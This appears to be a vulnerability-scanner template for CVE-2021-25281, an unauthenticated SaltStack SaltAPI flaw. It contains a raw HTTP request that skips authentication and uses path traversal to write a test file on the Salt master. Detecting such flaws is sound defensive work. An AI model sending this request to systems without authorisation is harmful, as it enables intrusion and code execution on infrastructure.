id: CVE-2021-25281 info: name: SaltStack wheel_async unauth access author: madrobot severity: critical description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. reference: - http://hackdig.com/02/hack-283902.htm - https://dozer.nz/posts/saltapi-vulns classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-25281 cwe-id: CWE-287 tags: cve,cve2021,saltapi,rce,saltstack,unauth requests: - raw: - | POST /run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} matchers-condition: and matchers: - type: word part: body words: - "return" - "tag" - "jid" - "salt" - "wheel" condition: and - type: status status: - 200